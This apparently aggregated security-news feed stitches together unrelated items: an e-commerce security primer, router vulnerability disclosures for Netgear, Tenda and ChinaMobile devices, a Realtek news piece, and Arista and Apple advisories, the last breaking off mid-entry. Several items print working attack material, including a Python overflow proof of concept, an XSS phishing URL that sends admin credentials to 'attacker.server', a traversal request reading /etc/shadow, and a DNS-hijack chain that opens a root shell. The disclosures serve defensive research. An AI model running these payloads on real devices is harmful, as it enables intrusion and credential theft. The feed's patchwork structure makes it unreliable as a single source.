By Owais Sultan
Perhaps it should give us pause for thought that one of the biggest revolutions in commerce and society…
This is a post from HackRead.com Read the original post: The Basics of Ecommerce Cyber Security

Perhaps it should give us pause for thought that one of the biggest revolutions in commerce and society has also brought with it a whole new dimension of cyber security and cybercrime threats.

Of course, we are talking about the Internet revolution and everything it has led to. We now most often communicate across the Internet and we send all kinds of data, files, and documents. Some of that is pretty valuable, so cybercrime has come calling.

For the successful functioning of a business, online or offline, theft needs to be prevented. Traditionally, this probably only accounted for the theft of stock, but nowadays, it is more the theft of information that new businesses are most concerned about. The reason for this is simple enough: most businesses at least have an online dimension, and the only transaction that occurs online is the transfer of information.

You are never actually sending money when you make a bank transfer; you are sending information that affects the respective bank balances of those involved. This data can be stolen and converted into real financial gains for criminals.

This is why cybersecurity is vital for any online activity, from simple personal computer use right up to the online business. Any **internet-enabled device** purchased today will more often than not come with a full package of cybersecurity software, from firewalls to anti-virus software and sensitive data encryption. For businesses, this becomes doubly important because there is so much more at stake.

**The Arms Race**

The other thing about cyber security, especially for **e-commerce**, is that it is constantly evolving. Every other month, cyber-criminals refine their techniques and make use of more advanced tools and technologies. Hacking is a serious discipline carried out not only by criminals but also by government agencies tasked with enormous commitments, such as ensuring national security and fighting terrorism.

This is all you need to consider to see how vital cyber security is and how essential it is that it is constantly updated and refined. The criminals are doing that, so your business needs to do it too. It is an arms race, with each development on one side necessitating a responsive development on the other.

If you run a small e-commerce business, then this might all seem pretty daunting. Luckily, criminal interest in online companies scales in direct proportion to the size of the company and the valuable information and funds it handles. Therefore, your response should always be proportional. There is no need to break the bank for your small online art and craft store.

However, you can never neglect cyber security, and you can never rest for long before you must consider updating it. New technology could be the reason for updating, or it might be due to business growth. Both technological advancements by criminals and the growth of your business increase the risks.

**What Are the Threats to Ecommerce?**

So, assuming that you run a small- to mid-sized e-commerce venture (no large company needs an introduction to cyber security), what are the most common cyber risks associated with your endeavour?

Well, there are many. Cyberattacks can constitute the theft of information, but they can also lead to the loss of physical assets as well. When this latter threat is posed, it is usually because hackers have found a way to hack your digital order fulfilment system.

Cybercriminals do not just work with a keyboard and screen. For example, once information concerning your delivery routes has been stolen, it is all the easier for criminals to organize a heist – in the real world. 

Of course, though, simple security of information is where it all begins; risks tend to arise when information is transferred. For example, an insecure office network that is not protected against hackers allows for information and data to be stolen. Even simple things, such as password protection and administrator privileges, are forms of cyber security that address specific cyber risks.

Finally, there is a risk inherent in slow Internet speeds, too. A cyber attack can happen in the blink of an eye (electronic signals are transferred significantly faster than the blink of an eye), so you need to know when one has occurred and act as soon as possible. To shore up defence here, you might invest in network monitoring software and **WiFi 6** internet providers to establish a virtual guard tower.

**A Cyber Security Infrastructure **

So, that is the reality of the situation, and these are the threats you are up against. But, how do you get started in creating a robust cybersecurity infrastructure? Perhaps the best way to answer this question is to look at some cyber security practices and guidelines that cover the most important bases.

**Payment Card Industry Data Security Standard (PCI DSS) **

Often referred to solely as **PCI**, this is a widespread industry standard that ensures bank and card details are transferred securely. Here, we see the legal dimension of cybersecurity. Consulting the PCI is a great way to cover the most essential bases when it comes to security for this sensitive information.

**International Organization for Standardisation (ISO) **

No business staying on the right side of the law should consult the ISO and specifically the **ISO IEC 27002:2013** for cyber security. The internet doesn’t tend to respect borders, and neither does international regulations. Accordingly, the ISO allows businesses to ensure their practices are in line with everyone else’s. Achieving this certification is a good first step to take.

**Personal Data**

Personal data is a necessarily broad category that includes any data related to a specific person. The aforementioned card details would be an example, as would a customer’s address, or simply their name. There are several regulations concerning this, the most important of which is probably the **GDPR**.

**HTTPS Authentication **

What is the difference between **HTTP and HTTPS**? Most simply, the latter is the former with encryption added. You will recognize these characters from the beginning of every web address you visit in your browser. HTTPS means that the data has been encrypted, meaning it cannot be accessed by any intermediaries. Having HTTPS in your URL is also a trust indicator for customers, especially because bank transfers often have their specific web address when underway.

**Conclusion **

You shouldn’t see the strong **legal regulation of cyber security** as a bad thing. Sure, the law will require you to toe the line, but this is necessary. The alternative could be far worse for your business. Furthermore, the number of helpful compliance guidelines can let you know from the outset what you need to invest in before you start trading, giving you peace of mind thereafter.

The Basics of Ecommerce Cyber Security

Netgear routers R7000P before v1.3.3.154, R6900P before v1.3.3.154, R7960P before v1.4.4.94, and R8000P before v1.4.4.94 were discovered to contain a pre-authentication stack overflow.

*   Product links: https://www.netgear.com/support/product/r7000p.aspx
*   Version: < 1.3.3.154
*   Author: Jean-Jamil Khalife

**Vulnerable models**

**Nighthawk WiFi Mesh Systems**

*   MR60 fixed in firmware version 1.1.7.132
*   MS60 fixed in firmware version 1.1.7.132

**Routers**

*   R6900P fixed in firmware version 1.3.3.154
*   R7000P fixed in firmware version 1.3.3.154
*   R7960P fixed in firmware version 1.4.4.94
*   R8000P fixed in firmware version 1.4.4.94

**Disclosure Timeline**

*   2022-07-22 Netgear contacted
*   2022-11-01 Fix integrated

**Introduction**

Pre-auth remote code execution vulnerability found in the NETGEAR Nighthawk r7000p on the WAN interface.

Nighthawk R7000P is a popular dual-bank WiFi router advertised with gaming-focused features, smart parental controls, and internal hardware that is sufficiently powerful to accommodate the needs of home power users.

The vulnerability resides in the **/tmp/media/nand/router-analytics/aws\_json** binary, running on the Netgear router.

Due to increasing demand, we do vulnerability research on connected objects (router, camera, printer, etc.). One of the missions entrusted to us by our client was to find vulnerabilities on a selection of embedded devices, including the aforementioned Netgear Nightawk router. Several vulnerabilities have been discovered and will be published on the blog.

**Vulnerability**

This vulnerability can be remotely exploited by an attacker on the WAN side of the router, without authentication. The **aws\_json** daemon fetches json data from a webserver and a buffer overflow can be triggered when parsing this content.

By placing a malicious json content in a webserver and redirecting the router to download it (either by DNS redirection or TCP redirection), an attacker can execute arbitrary code. As aws\_json runs under the root user, the attacker gains full privileges on the router.

aws\_json is a program that connects to the domain devicelocation.ngxcld.com when the router starts. It sends an HTTP GET request at the address **https://devicelocation.ngxcld.com/device-location/resolve** to fetch information about the device location.

The server reponse is a json content that specifies information like city, country, etc.

We noticed that the curl request is sent using the HTTPS protocol. However, the **\-k** option given to curl explicitly prevents certificate signature and CommonName veritication. In other words, it means that anybody can impersonate the remote server. The json content will be written to file **/tmp/xCloud\_MAXmind** which is then parsed by aws\_json.

Here is the function body that parses the file:

However, the strcpy() function does not check the size of each field. It’s possible to write a large enough content leading to a stack buffer overflow.

**Exploitation****Overwriting function pointer**

We noted the binary is not ASLR compiled and the executable addresses are in the range 0x00008000 and 0x00027000. All other mapped modules run with randomized base addresses.

00008000-00027000 r-xp 00000000 1f:11 315        /tmp/media/nand/router-analytics/aws\_json

So, we needed to overwrite the PC register with an address in the binary, but also needed to put a null char at the end. This was made possible thanks to the strcpy() function.

**Finding gadget**

By exploring all gadgets pointing to the system() function, we can see at offset 0x00014E20:

SP points to contents that are not immediately controllable because it is located just after the return address. It is not possible to write there because strcpy() stops at the null byte. However, the vulnerability can be triggered twice, thanks to the multiple strcpy() calls. We can trigger in this order:

*   The first stack buffer overflow writes the payload to execute (here it is **utelnetd -l /bin/sh;**)
*   The second stack buffer overflow controls the PC value, redirecting execution flow

So, with these two overflows, we can call system() and execute our payload written on the stack.

To perform this attack, We configured a Raspberry Pi 4 as follows:

*   Configuration in router mode to intercept and modify requests (dnsmaq, dhcp server).
*   Edit dnsmasq.conf to hijack the DNS devicelocation.ngxcld.com: **address=/devicelocation.ngxcld.com/192.168.2.1**
*   Launch a custom HTTPS server in Python on 192.168.2.1 which will send the payload to aws\_json when the GET request is handled.

To summarize, we need to:

*   Plug the Netgear router WAN port into the ethernet port of the Raspberry Pi
*   Launch the HTTPS server.py
*   Boot the Netgear router and wait for a remote shell.
**Recommendations**

In general, it is important to force verification of HTTPS certificates by removing any -k (or --insecure) option from curl. Otherwise, it will be possible to intercept and modify on the fly via MiTM the packets that pass through, which can lead to the compromise of the router.

Also, it is necessary to replace strcpy() with safer functions -- such as strncpy() -- and to control the size of the processed data in order to avoid any buffer overflow.

**Conclusion**

This vulnerability research was requested by one of our customers who wanted to know if it was possible to compromise the company's routers.

The vulnerability we found made it possible to obtain a shell on the router which could subsequently lead to access to third-party subnets. Netgear is a major player in network devices for home and small/medium companies which makes their product a valuable target for hacker.

Note that other Netgear products were affected by the same vulnerability.

**References**

https://kb.netgear.com/000065242/Security-Advisory-for-Pre-authentication-Stack-Overflow-on-some-Routers-and-Nighthawk-WiFi-Mesh-Systems-PSV-2022-0146

CVE-2022-48176: Netgear Nighthawk r7000p aws_json Unauthenticated Double Stack Overflow Vulnerability

By Deeba Ahmed
This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.
This is a post from HackRead.com Read the original post: Critical Realtek Vulnerability Impacting IoT Devices Worldwide

As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.

According to a new report from Palo Alto Networks’ Unit 42 researchers, between August and October 2022, cybercriminals increased their efforts to exploit a Realtek Jungle SDK vulnerability.

Usually, researchers record 10% of all attacks targeting a single vulnerability. But in this case, over 40% of all attacks involved exploitation of the Realtek remote code execution **(RCE)** vulnerability.

**Vulnerability Analysis**

The Realtek Jungle SDK RCE is tracked as **CVE-2021-35394**, rated 9.8. As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.

This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.

Hackers find it useful because it can create **supply-chain issues** that make it difficult for users to identify the products that attackers are exploiting. It’s an arbitrary command injection and buffer overflow bug that could be leveraged to execute arbitrary code and gain the highest level of privileges, eventually hijacking the infected device appliance.

**Attack Details**

According to Unit 42’s **blog post**, most of the attacks observed were attempts to deliver malware and compromise **vulnerable IoT devices**, indicating that threat actors aim to launch large-scale attacks against internet-connected devices worldwide.

Around 50% of the attacks (48.3% to be precise) were launched from the USA, followed by Vietnam (17.8%) and Russia (14.6%). Other prominent regions include the Netherlands (7.4%), Germany (2.3%), France (6.4%), and Luxembourg (1.6%).

Moreover, 95% of the attacks targeting the vulnerability and originating from Russia were launched against Australian organizations.

**Potential Dangers**

Unit 42 identified three kinds of payloads that were distributed through in-the-wild exploitation of this bug. The first payload was a script that executed a shell command on the targeted server and downloaded another malware.

The second payload is an injected command that writes a binary payload to a file and executes that file. The third is an injected command that directly reboots the targeted server to launch DoS (denial of service) attacks.

Additionally, attackers can exploit this bug to deliver known botnets such as **Mozi**, **Mirai**, **Gafgyt**, and the new Golang-based DDoS botnet called RedGoBot.

Vulnerable IoT devices include IP cameras, routers, residential gateways, and Wi-Fi repeaters from at least 66 vendors, including Belkin, D-Link, ASUS, Huawei, LG, ZTE, Logitech, Zyxel, and **NETGEAR**.

**_More IoT Security News_**

1.  BotenaGo botnet malware targeting millions of IoT devices
2.  IoT Devices Hacked to Install Ransomware on OT Networks
3.  ThroughTek Flaw Exposed Millions of IoT Cameras to Spying
4.  Millions of IoT devices, baby monitors open to video snooping
5.  Access:7 Supply Chain Flaws Impact ATMs, Medical, IoT devices

Critical Realtek Vulnerability Impacting IoT Devices Worldwide

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection. A malicious unauthenticated attacker can exploit this vulnerability using a specially crafted URL. This affects firmware versions: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1.

**Response Splitting via CRLF****Description**

CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html

Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP headers parse certain characters such as \\rand \\n. Appending these characters to HTTP headers can allow the insertion of payloads into a header which can result in the manipulation of cookies, server information, and status codes.

Type: Unauthenticated Remote attack

Tested on firmware version: V1.1.0.112\_1.0.1, V1.1.0.114\_1.0.1

**Details**

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.

This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user's browser.

**Impact**

A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:

1.  Perform actions on the administrative portion of the web application Example payload that enables the debug telnet interface: https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
    
2.  Obtain the administrator's credentials through phishing Example phishing payload: https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt("Username");var pass=prompt("Password");document.location="http://attacker.server/?user="+name+"?pass="+pass;</script>
    

Note that if another vulnerability is presented in the administrative portal such as a Remote Command Execution (RCE), an attacker can use a specially crafted URL and chain the two vulnerabilities to create a one-click exploit.

**Evidence**

The request consists of a resource that does not exist ("xsstesty") followed by Line-Feed characters (%0A%0A) and the JavaScript payload.

Request

    GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E 
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: sessionid=sid17289xxx158005xxx1087458037
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    

Note that the HTTP response headers are embedded directly into the 404 page response body and the payload is executed on the victim's browser.

Response Body

    <script>alert('xss');</script> HTTP/1.1 404 Not Found
    Server: 
    Date: Fri, 02 Jan 1970 02:44:27 GMT
    Content-Type: text/html
    P3P: 443
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1;mode=block
    X-Content-Type-Options: nosniff
    Connection: close
    
            <HTML>
            <HEAD><TITLE>404 Not Found</TITLE></HEAD>
            <BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
            <H4>404 Not Found</H4>
    File not found.
    </BODY>
    </HTML>
    

**Remediation**

Sanitize and neutralize all user-supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.

CVE-2022-47052: NETGEAR/CVE-2022-47052 at main · dest-3/NETGEAR

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet.

****CVE-2023-24166****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "formWifiBasicSet" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

import requests
from pwn import \*

url \= 'http://x.x.x.x/goform/WifiBasicSet'
pl \= 'a'\*564+p32(0xdeadbeef)
data \= {'security\_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid\_5g':'1', 'ssid\_5g':'1', 'wrlPwd\_5g': '1'}

requests.post(url, data\=data)

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24166: Tenda/2.md at main · DrizzlingSun/Tenda

An issue was discovered in the default configuration of ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C_WIFI-V0.05), allows attackers to gain access to the configuration interface.

**Blank passwords and default factory settings**

ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C\_WIFI-V0.05) is shipped and deployed without an administrative password on port **8080** and the web configuration interface is accessible using the following syntax: **http://<target ip>:8080.** From the configuration page an attacker can change the router configuration or he can try to obtain access to the internal network.

**Directory traversal vulnerability**

A different directory traversal vulnerability than the one identified by Rahul Raz (https://www.exploit-db.com/exploits/40304) was identified by using:

**_GET /cgi-bin/webproc?getpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&errorpage=html/main.html&var:language=zh\_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage=-_**

to retrieve the **_etc/shadow_** file where two user accounts were identified with the corresponding hashed passwords:

**root:<hash\_deleted>:13796:0:99999:7:::**

**#tw:<hash\_deleted>:13796:0:99999:7:::**

**Attack surface**

Over 4,320 vulnerable PLC Wireless routers were identified using Shodan. Most of the devices are located in South America (Argentina, Brazil, Honduras, Colombia) followed by Asia (Indonesia, India, Thailand).

**Remediation**

Adding a password to the admin user accounts should reduce the risk of being exploited. The risk of a successful directory traversal still exist and given the fact that the user can’t change the **tw** account password other risk mitigation strategies should be employed.

CVE-2020-18330: Insecure permissions and multiple vulnerabilities in ChinaMobile PLC wireless routers leaves more than 4,300 devices vulnerable to remote attacks

Directory traversal vulnerability in ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C_WIFI-V0.05), via the getpage parameter to /cgi-bin/webproc.

**Insecure permissions and multiple vulnerabilities in ChinaMobile PLC wireless routers leaves more than 4,300 devices vulnerable to remote attacks Blank passwords and default factory settings**

ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C\_WIFI-V0.05) is shipped and deployed without an administrative password on port 8080 and the web configuration interface is accessible using the following syntax: http://:8080. From the configuration page an attacker can change the router configuration or he can try to obtain access to the internal network.

**Directory traversal vulnerability**A different directory traversal vulnerability than the one identified by Rahul Raz (https://www.exploit-db.com/exploits/40304) was identified by using:

GET /cgi-bin/webproc?getpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage=- to retrieve the etc/shadow file where two user accounts were identified with the corresponding hashed passwords:

root:<hash_deleted>:13796:0:99999:7::: #tw:<hash_deleted>:13796:0:99999:7:::

**Attack surface**Over 4,320 vulnerable PLC Wireless routers were identified using Shodan. Most of the devices are located in South America (Argentina, Brazil, Honduras, Colombia) followed by Asia (Indonesia, India, Thailand).**Remediation**Adding a password to the admin user accounts should reduce the risk of exploitation. The risk of a successful directory traversal still exist and given the fact that the user can’t change the tw account password other risk mitigation strategies should be employed.**Author**Sergiu Sechel (https://sergiusechel.medium.com/insecure-permissions-and-multiple-vulnerabilities-in-chinamobile-plc-wireless-routers-leaves-more-d3eb9ff70d24)

CVE-2020-18331: CVEs/CVE_2020_18331.md at main · cybertoxin/CVEs

For certain systems running EOS, a Precision Time Protocol (PTP) packet of a management/signaling message with an invalid Type-Length-Value (TLV) causes the PTP agent to restart. Repeated restarts of the service will make the service unavailable.

April 26th, 2022

**Revision**

**Date**

**Changes**

1.0

April 26th, 2022

Initial release

1.1

May 16th, 2022

Updated hotfix information

The CVE-ID tracking this issue: CVE-2021-28510  
CVSSv3.1 Base Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)  
Common Weakness Enumeration: CWE-400 (Uncontrolled Resource Consumption)  
This vulnerability is being tracked by BUG638107

****Description****

For certain systems running EOS, a Precision Time Protocol (PTP) packet of a management/signaling message with an invalid Type-Length-Value (TLV) causes the PTP agent to restart. Repeated restarts of the service will make the service unavailable.

The impact of this issue is that a remote attacker can make the PTP service unavailable. If this happens, the switch will fail to provide PTP time synchronization services to the devices downstream, leading to the degrading of the time maintained by the downstream devices.

This issue was discovered by a customer and Arista is not aware of any malicious uses of this issue in customer networks.

**Vulnerability Assessment****Affected Software**

EOS Versions

*   4.27.1 and below releases in the 4.27.x train
*   4.26.4 and below releases in the 4.26.x train
*   4.25.6 and below releases in the 4.25.x train
*   4.24.8 and below releases in the 4.24.x train
*   4.23.10 and below releases in the 4.23.x train
*   4.22.x train

**Affected Platforms**

The following products are affected by this vulnerability:

Any platform supporting PTP.

Arista EOS-based products:

*   7020R Series
*   7050X/X2/X3 series
*   7060X/X2/X4 series
*   7150 series
*   7170 series 
*   720XP series
*   7250X series
*   7260X/X3 series
*   7280E/R/R2 series
*   7300X/X3 series
*   7320X series
*   7368 / X4 series
*   7500E/R/R2 series
*   7500R3 Series
*   7800R3 Series
*   7280R3 Series

The following product versions and platforms are not affected by this vulnerability:

*   Arista EOS-based products:
    *   7010 series
    *   7160 series
    *   750X series
*   Arista Wireless Access Points
*   CloudVision WiFi, virtual appliance or physical appliance
*   CloudVision WiFi cloud service delivery
*   CloudVision Portal, virtual appliance or physical appliance
*   CloudVision as-a-Service
*   Arista 7130 Systems running MOS
*   Arista Converged Cloud Fabric and DANZ Monitoring Fabric (Formerly Big Switch Nodes for BCF and BMF)
*   Awake Security Platform

**Required Configuration for Exploitation**

In order to be vulnerable to CVE-2021-28510 the following conditions must be be met:

PTP should be enabled on the switch. To determine if PTP is enabled on the switch,

switch# show ptp
PTP Mode: Boundary Clock
PTP Profile: Default ( IEEE1588 )
Clock Identity: 0x74:83:ef:ff:ff:00:23:b1
Grandmaster Clock Identity: 0x00:00:00:00:00:00:00:00
Number of slave ports: 1
Number of master ports: 4
Offset From Master (nanoseconds): 0
Mean Path Delay (nanoseconds): 0
Steps Removed: 0
Skew (estimated local-to-master clock frequency ratio): 1.0

**Indicators of Compromise**

This issue causes the PTP agent to crash. If you are seeing a high number of syslog messages stating that the PTP agent is being restarted, this issue is potentially being exploited.

Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-6-PROCESS\_TERMINATED: 'Ptp' (PID=17476, status=15) has terminated.
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-6-PROCESS\_RESTART: Restarting 'Ptp' immediately (it had PID=17476)
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-7-PREDECESSOR\_WAITING: New instance of Ptp (PID=17833): waiting for reaping of predecessor (PID=17476)
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-7-PREDECESSOR\_GONE: New instance of Ptp (PID=17833): predecessor (PID=17476) has been reaped.
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-6-PROCESS\_STARTED: 'Ptp' starting with PID=17833 (PPID=3067) -- execing '/usr/bin/Ptp'
Apr 12 02:32:08 ok312 Ptp: %AGENT-6-INITIALIZED: Agent 'Ptp' initialized; pid=17833

**Mitigation**

Install ACL rules to drop PTP packets from untrusted sources. Best practice is to block access to untrusted (non-management) networks.

ptp ip access-group ptpAcl in
<-------OUTPUT OMITTED FROM EXAMPLE-------->
!
ip access-list ptpAcl
   10 deny ip host 10.10.10.1 any

**Resolution**

The recommended resolution is to upgrade to a remediated software version at your earliest convenience. Arista recommends customers move to the latest version of each release that contains all the fixes listed below.

CVE-2021-28510 has been fixed in the following releases:

*   4.27.2 and later releases in the 4.27.x train
*   4.26.5 and later releases in the 4.26.x train
*   4.25.7 and later releases in the 4.25.x train
*   4.24.9 and later releases in the 4.24.x train
*   4.23.11 and later releases in the 4.23.x train

For immediate remediation until EOS can be upgraded, the following hotfix is available.

**Hotfix**

The following hotfix can be applied to remediate CVE-2021-28510. The hotfix applies only to 4.23.10 and no other releases. All other versions require upgrading to a release containing the fix (as listed above).

Note: Installing/uninstalling the SWIX will cause the PTP agent to restart.

**Version:** 1.0

**URL:****SecurityAdvisory76\_CVE-2021-28510\_Hotfix.swix**

**SWIX hash:**

(SHA-512)2b78b8274b7c73083775b0327e13819c655db07e22b80038bb3843002c679a798b53a4638c549a86183e01a835377bf262d27e60020a39516a5d215e2fadb437

For instructions on installation and verification of the hotfix patch, refer to the “managing eos extensions” section in the EOS User Manual. Ensure that the patch is made persistent across reboots by running the command ‘_copy installed-extensions boot-extensions_’.

**For More Information**

If you require further assistance, or if you have any further questions regarding this security notice, please contact the Arista Networks Technical Assistance Center (TAC) by one of the following methods:

**Open a Service Request**

Contact information needed to open a new service request may be found at: https://www.arista.com/en/support/customer-support

CVE-2021-28510: Security Advisory 0076 - Arista

Your smartphone or wearable could help you out in a truly dangerous situation. Here are some options to consider.

The Best Personal Safety Devices, Apps, and Alarms (2023)

Apple Security Advisory 2023-01-23-4 - macOS Ventura 13.2 addresses buffer overflow, bypass, code execution, information leakage, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-23-4 macOS Ventura 13.2

macOS Ventura 13.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213605.

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog)

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl  
version 7.86.0.  
CVE-2022-42915  
CVE-2022-42916  
CVE-2022-32221  
CVE-2022-35260

dcerpc  
Available for: macOS Ventura  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco  
Talos

DiskArbitration  
Available for: macOS Ventura  
Impact: An encrypted volume may be unmounted and remounted by a  
different user without prompting for the password  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may lead to a denial-of-service  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)

Intel Graphics Driver  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-23507: an anonymous researcher

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23504: Adam Doupé of ASU SEFCOM

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Mail Drafts  
Available for: macOS Ventura  
Impact: The quoted original message may be selected from the wrong  
email when forwarding an email from an Exchange account  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23498: an anonymous researcher

Maps  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23503: an anonymous researcher

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23497: Mickey Jin (@patch1t)

Safari  
Available for: macOS Ventura  
Impact: An app may be able to access a user’s Safari history  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Safari  
Available for: macOS Ventura  
Impact: Visiting a website may lead to an app denial-of-service  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2023-23512: Adriatik Raci

Screen Time  
Available for: macOS Ventura  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)

Vim  
Available for: macOS Ventura  
Impact: Multiple issues in Vim  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-3705

Weather  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an  
anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 245464  
CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming  
Wang, JiKai Ren and Hang Shu of Institute of Computing Technology,  
Chinese Academy of Sciences

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Wi-Fi  
Available for: macOS Ventura  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
